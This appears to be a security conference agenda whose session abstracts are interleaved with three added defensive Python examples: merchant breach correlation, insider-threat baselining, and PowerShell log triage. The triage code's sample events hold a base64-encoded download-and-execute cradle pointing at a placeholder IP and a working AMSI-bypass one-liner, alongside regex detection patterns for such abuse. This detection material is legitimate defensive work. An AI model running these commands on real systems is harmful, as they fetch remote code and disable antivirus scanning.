Mr. Salil Jain, Aetna and Mr. Heath Henry, Aetna

Security vulnerabilities in a merchant's or card processor's payment card environment leave room for threat actors to exploit them, and the resulting data breaches are nearly impossible to detect until the stolen cards begin to be used for fraudulent purchases. This session will review how probabilistic correlation, the Jaccard (similarity) index, which measures the overlap between two sets as the size of their intersection divided by the size of their union, and manual investigation have helped issuers detect compromises and protect against fraud.
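The Jaccard index named in this abstract (and in its 1:15 PM run) is most useful to an issuer as a way to rank merchants as candidate common points of compromise: compare the set of cards seen at each merchant with the set of cards later reported as fraud, and let the union in the denominator penalize very large merchants that would otherwise dominate a raw overlap count. The block below is an added example written for this page, not the Aetna presenters' code; the transactions and card tokens are constructed, and the `min_overlap` cutoff is an assumption.

```python
"""Common-point-of-compromise ranking with the Jaccard index.

Added example: for each merchant, compare the set of cards that transacted there with the
set of cards later reported as fraudulent. Jaccard = |A & B| / |A | B| penalizes merchants
with huge card bases that would dominate a raw overlap count. All data below is constructed;
card numbers are stand-in tokens, as they should be in any real analysis (never raw PANs)."""
from collections import defaultdict


def jaccard(a, b):
    """Similarity of two sets in [0, 1]; two empty sets are defined here as 0.0."""
    union = a | b
    return len(a & b) / len(union) if union else 0.0


def cards_by_merchant(transactions):
    """Index (card_token, merchant, day) rows into merchant -> set of card tokens."""
    index = defaultdict(set)
    for card, merchant, _day in transactions:
        index[merchant].add(card)
    return index


def rank_merchants(transactions, fraud_cards, min_overlap=2):
    """Return (merchant, jaccard, overlap, card_base) tuples, best candidate first.

    min_overlap drops merchants touched by a single fraud card, which is almost always noise."""
    ranked = []
    for merchant, cards in cards_by_merchant(transactions).items():
        overlap = len(cards & fraud_cards)
        if overlap < min_overlap:
            continue
        ranked.append((merchant, round(jaccard(cards, fraud_cards), 3), overlap, len(cards)))
    return sorted(ranked, key=lambda r: (-r[1], -r[2]))


# --- constructed sample data -------------------------------------------------
FRAUD_CARDS = {f"tok-{i:04d}" for i in range(1, 6)}  # five cards reported as fraud


def _txns(merchant, card_ids, day):
    return [(f"tok-{i:04d}", merchant, day) for i in card_ids]


SAMPLE_TRANSACTIONS = (
    _txns("BigBoxMart", range(1, 21), "2019-10-01")      # all 5 fraud cards, but 15 clean ones too
    + _txns("CornerGas", [1, 2, 3, 4, 21], "2019-10-02")  # 4 of 5 fraud cards out of only 5 seen
    + _txns("Pharmacy", [2, 3], "2019-10-03")
    + _txns("Bakery", [1, 30], "2019-10-03")              # one fraud card: below min_overlap
)

if __name__ == "__main__":
    for merchant, sim, overlap, base in rank_merchants(SAMPLE_TRANSACTIONS, FRAUD_CARDS):
        print(f"{merchant:<12} jaccard={sim:.3f} fraud_cards={overlap} card_base={base}")
```

On the sample data the national retailer touched every fraud card yet ranks last (0.25), while the small gas station with four of five ranks first (0.667); that inversion is the whole reason to use Jaccard rather than a count. In practice the transaction window should be restricted to the period before the first fraud report, and the ranked list is an input to the manual investigation the abstract mentions, not a verdict.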

2:15 PM

Applied Innovation to Reduce Risk in Access Management

Ms. Neha Joshi, Accenture Security and Mr. John Denning, Bank of America

As corporate environments become more complex, dynamic and data-driven, Access Management programs need to eliminate manual processes and use predictive analysis to maintain the currency of their controls. Attendees will review the journey one financial institution took by applying innovation to uncover access risk and explore the necessary steps to mitigate risk. Attendees will also learn how to introduce automation and analytics to increase efficiency and accuracy, while reducing risk to their organization.

2:15 PM

(Repeat) FS-ISAC Information Sharing Best Practices Document & Practical Tips

Mr. Kyle Davis, Target Corporation

This presentation will introduce members to the FS-ISAC Information Sharing Best Practices document, which will be newly updated in time for the Fall Summit. In addition, the presentation will discuss practical approaches to overcoming common obstacles and objections related to information sharing.

2:15 PM

What to Expect When Expecting a Pen Test

Mr. Tony Drake, Intercontinental Exchange / NYSE

Penetration tests. We all do them. The regulators require them. The board wants to see them. But they are taking more time, more resources and more effort. So how do we move from just ticking a box and filing a report to a test that creates value and moves the needle on security and on your security program as a whole? This session starts from the premise that you are already doing pen tests and then walks through pen testing from inception to planning, execution, follow-up and remediation. It aims to lay out the pitfalls and traps that await any pen-testing plan and how to avoid them.

2:15 PM

Risk Management & Technology Can Be Friends

Mr. William Bailey, Police & Fire FCU

As FIs, we have to comply with regulations surrounding our technology, but how do we bridge the gap between Risk Management and Technology? Tackling Risk Management actually leads to better compliance, and regulators are increasingly asking "why" something was implemented, even considering it more important than the specific "what". During this presentation, we'll discuss strategies to proactively embed Risk Management into our System Life Cycle activities.

3:00 PM

Networking Break

3:30 PM

Mobile Risk and Compliance in a Post-Perimeter Era

Mr. Aaron Cockerill, Lookout

With the majority of fraudulent transactions taking place on mobile devices, and the volume of those transactions increasing, this session will explore the associated risk and compliance issues. Attendees will leave with a new understanding of how a post-perimeter security model, which applies a risk-based approach to authentication, can be applied to mobile devices.

3:30 PM

(Repeat) Synthetic Identity: Are You Who You Say You Are?

Mr. Kevin Thomsen, Bank of America

This session provides attendees with an overview of synthetic identity; a combination of fabricated credentials where the implied identity is not associated with a real person. Presenters will explain how fraudsters are exploiting this gap for financial gain and why synthetic identity is a blind spot for some financial institutions, due to organizational structure. The session will conclude with the latest on what’s being done at the industry-level and a high-level overview of what the banks are doing to mitigate risk.

3:30 PM

(Repeat) Making a Cyber Awareness Program Sexy

Mr. Mandouh Csintalan, RenaissanceRe

Security often struggles to capture the attention of other departments. But when a security incident occurs, security teams get all of the attention, and oftentimes the blame. This session reviews how security departments can push cyber-awareness programs within their organizations before an incident happens. The financial-services industry is among the most targeted for sophisticated cyber-attacks. We must train colleagues to be an extension of our cyber-army to thwart attacks.

3:30 PM

(Repeat) Using Behavior Analytics to Predict, Detect and Stop Insider Threats

Mr. Bryan Sheppard, State Farm

Conventional cybersecurity tools, such as those aimed at data-loss prevention, intrusion-prevention, security-information and event-management, and network-monitoring, focus on defending the perimeter and offer little in the way of protecting against insider threats. IT security teams cannot monitor every action taken by every employee, consultant and privileged user, using manual processes. In this session, attendees will explore State Farm’s insider threat program and learn how the company’s user and entity behavior analytics platform compares real-time user behavior to base-lined, normal behavior.
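The core mechanic this session (and its 2:15 PM run) describes is comparing live user activity against a learned per-user baseline. The block below is an added example written for this page, not State Farm's platform or code: it learns each user's normal daily volume and the hosts they habitually touch, then scores a new day by volume z-score and by never-before-seen destinations. The activity history is constructed, and the threshold, standard-deviation floor and metric names are assumptions chosen for illustration.

```python
"""Per-user behavioral baseline for insider-threat detection.

Added example of the baseline-versus-live comparison: learn each user's normal daily volume and
the hosts they normally touch, then score a new day by volume z-score and by never-before-seen
destinations. All history below is constructed."""
import math
from collections import defaultdict


def baseline(daily_counts):
    """Mean and sample standard deviation of a user's daily counts over the learning window."""
    n = len(daily_counts)
    mean = sum(daily_counts) / n
    var = sum((x - mean) ** 2 for x in daily_counts) / (n - 1) if n > 1 else 0.0
    return mean, math.sqrt(var)


def z_score(value, mean, std, std_floor=1.0):
    """Standardized deviation; the floor keeps a perfectly flat baseline (std 0) from turning
    every one-unit blip into an infinite score."""
    return (value - mean) / max(std, std_floor)


def build_profiles(history):
    """history rows: (user, day, files_accessed, hosts). Returns user -> profile."""
    profiles = defaultdict(lambda: {"daily_counts": [], "known_hosts": set()})
    for user, _day, count, hosts in history:
        profiles[user]["daily_counts"].append(count)
        profiles[user]["known_hosts"].update(hosts)
    return profiles


def score_day(today, profile, z_threshold=3.0):
    """today: {'user', 'files_accessed', 'hosts'}. Alerts on a volume spike or new destinations."""
    mean, std = baseline(profile["daily_counts"])
    z = z_score(today["files_accessed"], mean, std)
    new_hosts = sorted(set(today["hosts"]) - profile["known_hosts"])
    reasons = []
    if z >= z_threshold:
        reasons.append(f"volume {today['files_accessed']} vs baseline {mean:.1f} +/- {std:.1f} (z={z:.1f})")
    if new_hosts:
        reasons.append("new hosts: " + ", ".join(new_hosts))
    return {"user": today["user"], "z": round(z, 2), "new_hosts": new_hosts,
            "alert": bool(reasons), "reasons": reasons}


def run_daily(history, today_rows):
    """Score every user who has a learned profile; users without one need a separate onboarding rule."""
    profiles = build_profiles(history)
    return [score_day(row, profiles[row["user"]]) for row in today_rows if row["user"] in profiles]


# --- constructed sample data -------------------------------------------------
_ALICE_COUNTS = [40, 45, 38, 50, 42, 47, 44, 41, 39, 46]
SAMPLE_HISTORY = (
    [("alice", f"2019-10-{d:02d}", c, ["fileshare-eng"]) for d, c in enumerate(_ALICE_COUNTS, start=1)]
    + [("bob", f"2019-10-{d:02d}", 5, ["fileshare-ops"]) for d in range(1, 11)]  # flat baseline
)
SAMPLE_TODAY = [
    {"user": "alice", "files_accessed": 400, "hosts": ["fileshare-eng", "fileshare-hr"]},  # spike + new host
    {"user": "bob", "files_accessed": 7, "hosts": ["fileshare-ops"]},                     # small blip only
]

if __name__ == "__main__":
    for r in run_daily(SAMPLE_HISTORY, SAMPLE_TODAY):
        print(r["user"], "ALERT" if r["alert"] else "ok", r["reasons"])
```

Two failure modes matter in production. A patient insider can train the baseline by ramping activity slowly, so the learning window should exclude days already under review and be compared against a peer group, not only the individual's own past. And a flat baseline like Bob's has zero variance, so without a floor on the standard deviation a change of two files would score as infinitely anomalous.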

3:30 PM

(Repeat) Partnering Offense and Defense: A Purple Team’s Journey

Mr. Chris Blow, Liberty Mutual and Mr. Brian Riley, Liberty Mutual

Internal red and purple teaming have seen a large uptick in popularity within the past five years. Unfortunately, not all implementations are successful for reasons ranging from budgetary and scope constraints, lack of forward-thinking vision, executive buy-in and structure. In this session, Liberty Mutual Insurance will share its purple team journey and how it’s driven material improvements toward its security program. Attendees will gain knowledge that will assist in creating a successful team of their own.

3:30 PM

(Repeat) What to Expect When Expecting a Pen Test

Mr. Tony Drake, ICE / NYSE

Penetration Tests. We all do them. The regulators require them. The board wants to see them. But they are taking more time, more resources and more effort. So how do we move from just ticking a box and saving a report, to a test that creates value and moves the needle on security and your security program as a whole? This session starts from the basic premise that you're already doing a pen-test and then walks through pen-testing from inception to planning, execution, followup and remediation. This session aims to lay out the pitfalls and traps that await any pen-testing plan and how to avoid them.

4:15 PM

Silver Showcase: Cybersecurity Hygiene Showcase

Mr. Miguel Sian, Cyber Observer

4:30 PM

Silver Solutions Showcase: NDR: The New Kid on the Block

Mr. Tanner Payne, Extrahop Networks

4:30 PM

Silver Solutions Showcase: 'How Secure Are We?'

Mr. Jesse Martin-Alexander, Tenable, Inc

4:30 PM

Silver Solutions Showcase: Finally a Next-Gen Anti-Phishing Solution

Mr. Mucteba Celik, RevBits LLC

4:30 PM

Silver Solutions Showcase: Eliminate Shadow Risk by Emulating Attacker Reconnaissance

Mr. Rob Gurzeev, CyCognito

4:30 PM

Silver Solutions Showcase: Why Collective Defense Matters

Mr. Gareth Owen, IronNet Security

5:30 PM

Reception

Wednesday 20 November

7:00 AM

Breakfast

8:00 AM

FS-ISAC Opening Remarks

8:15 AM

Breaking Down Silos: How CISOs Can Streamline ID Management

Mr. Rakesh Loonkar, Transmit Security

CISOs at leading enterprises are shortening the time to deliver identity-related projects from months to hours by using an integrated authentication and fraud-detection platform. In this session, attendees will hear firsthand about the problems with identity management, along with solutions that add an Identity and Access Management (IAM) orchestration layer to their environments. This session will also review how organizations bogged down in IAM deployment can find faster ways to introduce authentication technologies.

8:45 AM

Reducing Risk with Self-Hosted Open Source Messaging

Mr. Ian Tien, Mattermost, Inc.

To accelerate innovation while also increasing security and reducing risk, many leading financial services firms are moving to an open-source, Slack-compatible workplace messaging platform. Attendees will hear the case for how and why self-hosted open-source messaging can be more secure than other popular messaging platforms. The presenter will also discuss how firms are using the platform to increase DevOps productivity and improve team collaboration.

9:15 AM

Using Threat Objectives to Strategize and Measure Your Security Program

Mr. Jerry Perullo, ICE / NYSE

Faced with competing and confusing vocabularies around threats, risks and priorities, the presenter will share a set of 10 high-level threat objectives and demonstrate how this taxonomy has helped organize strategic, operational and tactical initiatives. Attendees will hear how to deliver threat intelligence to the board, respond to breaches in the news, set up the "Red Team" calendar and prioritize remediation efforts.

9:45 AM

Networking Break

10:15 AM

Cloud Best Practices for Broker Dealers

Mr. Peter Falco, FS-ISAC

A panel of Broker Dealers will provide their experiences and perspectives on either implementation or regulatory processes with cloud providers. This session will provide the attendees with techniques, strategies, and processes to navigate the cloud implementation journey at their own firms or assist in the creation of cloud strategies as their organizations prepare for implementation challenges.

10:15 AM

Lessons Learned from a Bank Moving 100% to the Cloud

Mr. Steven Lodin, Sallie Mae

Presenters will share observations regarding the process of moving the data center assets of a Top 100 bank entirely to the cloud. Attendees will discuss the golden rules for providing security and assurance during a full cloud migration, as well as the gotchas, surprises, lessons learned and the resulting strategic changes, to raise awareness and prevent future mistakes.

10:15 AM

Protecting Data at Scale

Mr. Omkhar Arasaratnam, JPMorgan Chase & Co., Mr. Tim Brophy, JPMorgan Chase & Co., and Mr. TJ Klevinsky, JPMorgan Chase & Co.

Securing data across a large, multinational firm is complex because data is mobile and not all trust boundaries are equal. This session reviews how JPMorgan Chase's data protection experts are using novel methods to build next-generation data protection systems at scale. The presentation focuses on lessons learned from JPMC's experience in developing a next-gen data-protection platform, including key decisions and discussions surrounding data classification and programmatic data handling; buying versus building the platform; top-down vs. bottom-up data governance; and convincing internal teams to adopt the platform.

10:15 AM

Striving for Cyber Resilience

Dr. Yonesy Nunez, Wells Fargo and Mr. Elon Ginzburg, Wells Fargo

This presentation will take a deep dive into cyber resilience. We will start by reviewing the current state of affairs around the increasingly popular term "cyber-resilience", looking at the variety of interpretations organizations use and what it means to actually be cyber-resilient. The presenters will share their view of what it means to be cyber-resilient in today's financial industry. In addition, we'll discuss how common design principles often align with modern development practices, and how cyber-resilience requires both specialist security activity and the development of wider organizational capabilities. Finally, we'll explore some of the key challenges in getting to a resilient state, with practical examples and lessons learned.

10:15 AM

Vulnerability Management and Risk Assessments: A Holistic Ecosystem

Ms. Jessica Colvin, JPMorgan Chase and Ms. Megan Larson, JPMorgan Chase

This presentation reviews JPMorgan Chase's approach to vulnerability management and risk assessment, and how the bank is effectively discovering, assessing, mitigating and remediating vulnerabilities at scale across an organization with approximately 250,000 employees globally. The session provides an overview of how one international bank is thinking about vulnerability management and risk assessment within the context of a technology estate transforming at pace, while still maintaining focus on protecting the firm and meeting regulatory requirements.

11:15 AM

(Repeat) Lessons Learned from a Bank Moving 100% to the Cloud

Mr. Steven Lodin, Sallie Mae

Presenters will share observations regarding the process of moving the data center assets of a Top 100 bank entirely to the cloud. Attendees will discuss the golden rules for providing security and assurance during a full cloud migration, as well as the gotchas, surprises, lessons learned and the resulting strategic changes, to raise awareness and prevent future mistakes.

11:15 AM

PowerShell for Security Nerds

Mr. Aaron Katz, SP Global

PowerShell is an extremely powerful administrative and automation tool that enables attackers and defenders alike to do devastating things to your network. This session explores PowerShell's capabilities, why attackers love it and highlights defenses the blue team can use to prevent and detect PowerShell abuse. Presenters also will share case studies about attackers’ previous uses and mitigation techniques.

11:15 AM

Member Authentication – A Medium-Sized Credit Union’s Story

Ms. Krista Baum, WSECU, Mr. Aaron Robel, WSECU and Mr. Rod Bell, WSECU

Four years ago, WSECU, a Washington state credit union, had an aging online banking platform, several third-party online financial tools for members and up to four different online logins per member. Fraudsters preyed on members with phishing attacks. Attendees will discuss the challenges of getting the credit union's leadership aligned on fixing digital identities and creating a realistic roadmap. Presenters will also share the challenges of onboarding technologies with a small team and the present state of single sign-on.

11:15 AM

(Repeat) Protecting Data at Scale

Mr. Omkhar Arasaratnam, JPMorgan Chase & Co., Mr. Tim Brophy, JPMorgan Chase & Co., and Mr. TJ Klevinsky, JPMorgan Chase & Co.

Securing data across a large, multinational firm is complex because data is mobile and not all trust boundaries are equal. This session reviews how JPMorgan Chase's data protection experts are using novel methods to build next-generation data protection systems at scale. The presentation focuses on lessons learned from JPMC's experience in developing a next-gen data-protection platform, including key decisions and discussions surrounding data classification and programmatic data handling; buying versus building the platform; top-down vs. bottom-up data governance; and convincing internal teams to adopt the platform.

11:15 AM

Defending Your Enterprise With Acronyms

Mr. Joe McMann, Capgemini

12:00 PM

Lunch

1:00 PM

Integrating Hunting & Forensic Triage into Insider Risk Programs

Mr. Doug Koster, American Express

This session will highlight the importance of integrating hunting and computer forensic triage into an existing insider risk program. Attendees will hear real world examples of how they have led to enhanced enterprise risk reduction. Presenters will also discuss hunting for anti-forensic tools, administrative shares, unapproved software and malware.

1:00 PM

Dissecting Android Malware

Ms. Marita Fowler, Capital One and Ms. Kathryn Torelli, Capital One

In this session, analysts will perform a live dissection of a malicious Android Package Kit (APK), explaining each step, allowing attendees to gain an understanding of the important APK components and the role they play in analysis. The presenters will also discuss the different criminals running these operations and ongoing initiatives that counter them. Attendees will leave with a deeper understanding of the malware threat landscape and a list of analysis tools and resources.

1:00 PM

(Repeat) Member Authentication – A Medium-Sized Credit Union’s Story

Ms. Krista Baum, WSECU, Mr. Aaron Robel, WSECU and Mr. Rod Bell, WSECU

Four years ago, WSECU, a Washington state credit union, had an aging online banking platform, several third-party online financial tools for members and up to four different online logins per member. Fraudsters preyed on members with phishing attacks. Attendees will discuss the challenges of getting the credit union's leadership aligned on fixing digital identities and creating a realistic roadmap. Presenters will also share the challenges of onboarding technologies with a small team and the present state of single sign-on.

1:00 PM

(Repeat) Striving for Cyber Resilience

Dr. Yonesy Nunez, Wells Fargo and Mr. Elon Ginzburg, Wells Fargo

This presentation will take a deep dive into cyber resilience. We will start by reviewing the current state of affairs around the increasingly popular term "cyber-resilience", looking at the variety of interpretations organizations use and what it means to actually be cyber-resilient. The presenters will share their view of what it means to be cyber-resilient in today's financial industry. In addition, we'll discuss how common design principles often align with modern development practices, and how cyber-resilience requires both specialist security activity and the development of wider organizational capabilities. Finally, we'll explore some of the key challenges in getting to a resilient state, with practical examples and lessons learned.

1:15 PM

Data Privacy as a Technology and Business Enabler

Ms. Sarah Ponge, E&Y

1:45 PM

Networking Break

2:15 PM

Why Internet Routing Security Matters to Financial Institutions

Andrei Robachevsky (Internet Society), Andrew Gallo (George Washington University), Karl Schimmeck (Morgan Stanley) and Steve Silberstein (FS-ISAC)

You likely see too many headlines today about internet routing going wrong, leading to latency issues, man-in-the-middle attacks, theft and more. FS-ISAC in partnership with the Internet Society wants to help members be proactive in solving these issues. This panel discussion of a community-led initiative called Mutually Agreed Norms for Routing Security (MANRS) reviews crucial fixes designed by MANRS that are reducing the most common routing threats. The panel will also discuss how members and network operators should work together to protect the core of the internet and themselves.

2:15 PM

Physical Pen-Testing: A Must-Have for Overall Security

Mr. Chris Carlis, Zurich Insurance Group

Cybersecurity areas of responsibility and threat modeling will often bump physical pen-testing to the bottom of the list. This session discusses the roles and responsibilities of the information security team in protecting an organization’s physical security. The session reviews how to reframe the discussion with higher-ups to better represent the risks and benefits and how to jumpstart the testing process by running through some of the more common TTPs used today.

2:15 PM

The Potential Impact of Deepfakes on Market Manipulation

Ms. Anna Skelton, Bank of America

Deepfakes, videos that use AI-based technology to create or alter content to misrepresent the truth, are becoming more indistinguishable from reality. Attendees will gain insight into how threat actors are increasingly using this technology to create content that could cause significant market disruption. Presenters will also discuss the proliferation of this content via social media and its potential to immediately impact global economies.

2:15 PM

Cross-Sector Sharing: How It Benefits Financial Institutions

Mr. Errol Weiss, H-ISAC and Mr. Bill Nelson, Global Resilience Federation

Threat actors don’t just target one industry. In many cases, the same malware is used to attack a variety of sectors. The National Council of ISACs and the Global Resilience Federation each play an important role in sharing attack data, as well as providing technological and analytical support for various sectors to consume and report information. Attendees will examine case studies on the effective use of cross-sector sharing to defend against cyberattacks.

2:15 PM

Leveraging Cyberthreat Intel to Find Account Takeover Activity

Mr. David DeLuca, Vanguard and Mr. Chris Plaisance, Vanguard

Account takeover activity is on the rise and a consistent problem for financial firms. This session reviews how to leverage cyber-intelligence with your fraud department to identify and prevent account takeovers. Attendees will discover that fusing the two teams will empower one cohesive team to emerge and combat account takeover activity. Presenters will demonstrate how this partnership provides additional protection to clients and discuss how automation streamlines the process, resulting in meaningful and measurable metrics.

2:15 PM

An Update From the FS-ISAC Measurements Working Group

Ms. Carin Salonia, The Hartford, Ms. Sarah Lachance, Liberty Mutual, Mr. Sounil Yu, Independent Presenter

Information security programs have a critical need to measure and manage the risk within an environment: from threat identification and protection, to risk mitigation, compliance and executive reporting. A uniform framework within the information security industry or the financial services sector does not currently exist. The FS-ISAC Measurements Working Group was created to develop a uniform set of measurements that FIs may adopt. Attendees will learn how the group was created, where the group is now and the remaining activities to have a defined set of measurements.

2:15 PM

(Repeat) PowerShell for Security Nerds

Mr. Aaron Katz, SP Global

PowerShell is an extremely powerful administrative and automation tool that enables attackers and defenders alike to do devastating things to your network. This session explores PowerShell's capabilities, why attackers love it and highlights defenses the blue team can use to prevent and detect PowerShell abuse. Presenters also will share case studies about attackers’ previous uses and mitigation techniques.
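The detection half of this session (and of its 11:15 AM run) comes down to reading what PowerShell actually executed. With Script Block Logging enabled, that text lands in Windows event 4104 in the Microsoft-Windows-PowerShell/Operational log, including the plaintext of anything passed through `-EncodedCommand`. The block below is an added example written for this page, not the presenter's material: it decodes encoded commands, scans the combined raw and decoded text for the indicators attackers lean on, and ranks events by a weighted score. The sample events are constructed, and the indicator regexes, weights and threshold are assumptions to tune against your own telemetry.

```python
"""Triage PowerShell script-block text (Windows event 4104) for common abuse indicators.

Added example: decode -EncodedCommand arguments (base64 of UTF-16LE), scan raw plus decoded text
for download cradles, Invoke-Expression, hidden windows, profile/policy bypasses and AMSI tampering,
and rank events by a weighted indicator score. Sample events below are constructed, not telemetry."""
import base64
import binascii
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand: -e, -ec, -en, -enc, ... -encodedcommand
ENCODED_ARG = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)

INDICATORS = {
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "download_cradle": re.compile(
        r"downloadstring|downloadfile|downloaddata|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "inline_base64": re.compile(r"frombase64string", re.I),
    "reflective_load": re.compile(r"\[reflection\.assembly\]::load|\[system\.reflection\.assembly\]::load", re.I),
    "amsi_tamper": re.compile(r"amsiutils|amsiinitfailed", re.I),
}
# Assumed weights: a lone -nop or a single web request is routine admin noise; AMSI tampering never is.
WEIGHTS = {"amsi_tamper": 3, "reflective_load": 2, "encoded_command": 2}


def decode_encoded_command(text):
    """Return the UTF-16LE string behind the first -EncodedCommand argument, or None."""
    m = ENCODED_ARG.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyze_script_block(text):
    """Return {'decoded': str|None, 'indicators': [sorted names]} for one script block or command line."""
    decoded = decode_encoded_command(text)
    scope = text if decoded is None else text + "\n" + decoded  # scan both layers
    hits = {name for name, rx in INDICATORS.items() if rx.search(scope)}
    if decoded is not None:
        hits.add("encoded_command")
    return {"decoded": decoded, "indicators": sorted(hits)}


def score(indicators):
    return sum(WEIGHTS.get(name, 1) for name in indicators)


def triage(events, threshold=2):
    """Return (record_id, score, indicators) for events at or above threshold, highest score first."""
    ranked = []
    for ev in events:
        result = analyze_script_block(ev["script_block"])
        s = score(result["indicators"])
        if s >= threshold:
            ranked.append((ev["record_id"], s, result["indicators"]))
    return sorted(ranked, key=lambda r: -r[1])


# --- constructed sample events (shape of event 4104 ScriptBlockText, not real captures) -------------
def _encode(cmd):
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


SAMPLE_EVENTS = [
    {"record_id": 1, "script_block": "powershell.exe -nop -w hidden -enc "
        + _encode("IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage.ps1')")},
    {"record_id": 2, "script_block": "Get-ChildItem C:\\Users | Measure-Object"},
    {"record_id": 3, "script_block": "Invoke-WebRequest -Uri https://updates.example.invalid/agent.msi -OutFile agent.msi"},
    {"record_id": 4, "script_block": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
        ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"},
]

if __name__ == "__main__":
    for record_id, s, indicators in triage(SAMPLE_EVENTS):
        print(f"record {record_id}: score={s} indicators={indicators}")
```

Event 4104 only exists if the "Turn on PowerShell Script Block Logging" policy (Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell) is enabled, so the first check in any environment is whether those events are being produced and forwarded at all. Pattern matching like this is a triage layer, not a control: the preventive side the abstract refers to is Constrained Language Mode, application control and AMSI, which is exactly why the AMSI-tampering indicator carries the highest weight here.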

2:30 PM

Red Team Best Practices

Mr. Conner Finlay, T. Rowe Price

This session is a must for implementing a red team at a smaller FI. Conducting such an operation presents unique challenges, which may not be as prevalent in other industries. Attendees will hear what works, doesn't work and recommendations.

2:45 PM

Building a Cyber Education Program

Mr. Jim Orr, Independent Financial

How can an enterprise educate employees and strengthen what is widely considered the weakest link in a bank's cybersecurity? Attendees will hear from a financial institution that has created a comprehensive cybersecurity education program for its employees. The presenter will also share incentives and other proven tactics that have increased participation in the institution's phishing awareness campaigns.

3:15 PM

Mobile Risks: Always Connected, Always a Threat

Mr. Ray Richards, PNC

The exponential growth of mobile device technology has made mobile device security a top priority for modern enterprises. As more companies integrate mobile technology into their daily operations, these devices have become a more lucrative target for attackers. Businesses expect constant employee connectivity, but the sensitive data employees handle on these devices puts both the data and the employees at greater risk. The presenter will review the real mobile threats, separating vendor hype from actual risk, and will offer tips on how to mitigate the vulnerabilities that matter.

3:15 PM

Proactive Insider Threat – The Convergence of Information Security, Legal and HR

Mr. George Albero, Bank of America, Ms. Shelley Thomas, Bank of America, Mr. David Nardoni, Bank of America and Mr. Scott Randolph, Bank of America

Presenters will discuss how binary metric data points from across an enterprise can be converged to create a holistic view of employees while protecting their privacy. This view enables the effective and non-discriminatory application of enhanced controls to proactively detect and prevent insider threats, while mitigating legal and operational risk to the institution.

3:15 PM

Metrics-Driven Security

Mr. Aaron Katz, S&P Global

Everyone knows how important information security is, right? That's why you got all that funding for your program. But how do you measure that success and show management an appropriate return on their investment? Being able to formulate a risk appetite, with supporting metrics, is crucial to running a successful information security program. This session explores various metrics and measures that can be presented at multiple levels of management, from the SOC manager all the way to the board of directors. These metrics can communicate the overall health of the program from an operational perspective, as well as provide key information to business stakeholders to allow informed decisions to be made.

3:15 PM

A Head Start to Create a Red Team

Ms. Stacy Monroe, Principal Financial Group and Mr. Tom Ervin, Principal Financial Group

An effective security program helps ensure the safe management of high-asset customers. Integrity guides the culture at Principal Financial Group, where regular analysis aims to improve the security perimeter and find the best ways to understand its weaknesses. In January 2019, Principal Financial Group launched its red team service. This session explains the process Principal Financial Group used to operationalize that red team. Attendees will learn exactly what a red team does and the value it brings, how to hire the right talent (based on skillset) for the red team, and the gotchas any red team should anticipate.

3:15 PM

FSSCC Cybersecurity Profile: Community Institution Implementation

Ms. Joyce Flinn, First United Bank & Trust

Various regulatory agencies are asking the same questions in several different ways, stretching already scarce cybersecurity talent. This is especially true for community institutions. This session will explore the logic behind the development of the FSSCC Cybersecurity Profile. Community institutions will discuss moving to the new profile and review the implementation process and lessons learned. Panelists will also discuss the first exam cycle conducted using the profile and how regulators received it.

3:15 PM

Developing a Process for Direct Deposit BEC Phishing

Mr. Pierre Lamy, S&P Global

This session will showcase a new threat intelligence program, achievable even for newly formed intelligence teams, whose service catalog is built from multiple workflows and services. One of the key services is the response to direct deposit BEC phishing, the business email compromise variant in which an attacker impersonates an employee to get payroll direct deposits redirected. The presentation will detail the processes used to execute that response, how the resulting intelligence is disseminated, and the feedback received on the new program.

3:15 PM

(Repeat) Integrating Hunting & Forensic Triage into Insider Risk Programs

Mr. Doug Koster, American Express

This session will highlight the importance of integrating hunting and computer forensic triage into an existing insider risk program. Attendees will hear real-world examples of how these activities have led to enhanced enterprise risk reduction. The presenter will also discuss hunting for anti-forensic tools, administrative shares, unapproved software and malware.

4:15 PM

Jeoparty